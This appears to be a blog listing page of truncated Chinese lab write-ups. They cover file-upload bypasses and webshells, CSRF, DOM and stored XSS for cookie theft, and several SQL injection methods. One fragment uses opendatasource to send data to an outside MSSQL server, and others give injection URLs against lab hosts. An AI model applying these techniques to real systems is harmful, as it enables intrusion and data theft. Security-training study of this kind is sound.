贵永康 文件上传解析漏洞 Pass06-10
Pass-06 文件后缀空绕过1、用前面制作好的图片马2、从源代码中可以看出,他没有去空,所以我们可以用后缀空绕过发现文件上传成功打开该图片地址,用hackbar,post传参显示Pass-07 文件后缀点绕过通过源代码可以看出,它只是判断文件名的第一个点后面的东西在数组中是否存在。所以我们可以抓包,把文件名的后缀改成 .php.这样就可以绕过它的验证。且 .php.可以当
贵永康 文件上传解析漏洞靶场解题思路 Pass01-05
Pass-01 前端验证绕过通过源码,我们可以知道他前端验证我们上传的图片是否为jpg、png、gif中的一种由于是前端验证,我们可以用burpsuite抓包改包如图上传成功,我们打开我们上传的一句话显示phpinfo()Pass-02 Content-Type方式绕过通过以上源码我们知道,他是服务器验证我们上传文件的Content-Type类型是否为jpeg、png、gif所以我们也可以用bur
贵永康 csrf靶场解题思路
一、打开靶场网站我们发现是一个dedecms框架的网站,我们可以百度搜索关于该框架网站的通杀漏洞。在https://xz.aliyun.com/t/2237中有该漏洞的操作通过该文章我们知道,我们需要用后台管理员的身份去访问http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles
贵永康 Dom based XSS 解题思路
一、进入靶场通过F12查看他的源码发现这里用到了document.write()这个方法,该方法可以接受ASCII编码我们修改url发现:二、我们可以通过url来把在页面中插入反射型XSS我们先把XSS PayLoad转换成ascii码可以弹窗三、我们把我们有反射型XSS的网页提交到dom.php中通过查看dom.php源码发现:他匹配的url为:以http://120.203.13.75:681
贵永康 存储型xss 解题思路
一、打开靶场,发现是一个cms5.0的网站,百度查找cms5.0通杀的xss漏洞二、根据该篇文章,我们知道cms建立的网站,在找到错误对象和方法的时候,会将他记录在数据库,并在后台回显给管理员,故当错误信息为xss的payload的时候可以获取管理员cookie三、具体步骤:传入m=test时,因为没有该方法,所以报错404,并把错误信息回显给用户这时,我们把m的值替换成xss的payload:&
贵永康 反弹注入 解题步骤
一、快速搭建MSSQL环境香港云网站:http://www.webweb.com/点击这里可以使用临时邮箱注册成功之后点击马上试用选中我是高手,下一步等待他搭建完成点击登入创建数据库随便输入进入控制台创建一个跟目标表字段数一样的表二、开始注入,注入语句为:insert into opendatasource('sqloledb','server=SQL5009.webweb
贵永康 DNS注入 解题思路
一、进入靶场,传参?id=1 and 1=1发现有防火墙二、我们试着绕过防火墙,输入http://120.203.13.75:8120/index3.php/1.txt?id=1 and 1=1绕过了该防火墙三、由于没有回显,我们又不想用盲注,所以我们可以使用dns注入输入:http://120.203.13.75:8120/index3.php/1.txt?id=1%20and%20(selec
贵永康 Access注入—偏移注入 解题思路
一、判断是否有注入点:我们直接在url上输入and 1=1发现被过滤掉了,于是我们试试用cookie注入绕过二、修改cookie页面正常页面异常存在注入点三、判断有多少字段页面正常页面异常有26个字段四、找到回显字段五、判断admin中有多少个字段页面正常,说明admin中有16个字段六、偏移显示字段内容慢慢的到数据!
贵永康 宽字节注入RANK1-3 解题思路
RANK 1一、输入id=1,如图:二、闭合单引号,判断是否有注入点发现其自动在单引号前面加了个反斜杠,使我们的单引号变成了一个字符串,从而无法闭合前面的单引号三、于是我们要想办法把这个反斜杠吃掉,我们可以试试宽字节注入的方法:我们在输入的单引号前面加上%df,发现他把反斜杠变成了一个汉字,于是我们就可以闭合前面的单引号,从而可以注入四、找到回显字段:2和3字段有回显五、找到数据库名称:六、通过系
贵永康 post注入RANK1-3 解题思路
RANK1一、进入我们的靶场,发现一个表单,我们正常进入发现sql语句如下:二、分析sql语句,我们可以进行如下输入:三、点击提交,如下所示:成功登录!四、才发现这里要我们拿到flag,所以我们要修改注入语句如下:这里我们拿到数据库名:security五、通过查找系统自带库,找到我们需要的表名和字段名:表名有:emails,referers,uagents,users,zkaqzkaq表中字段名有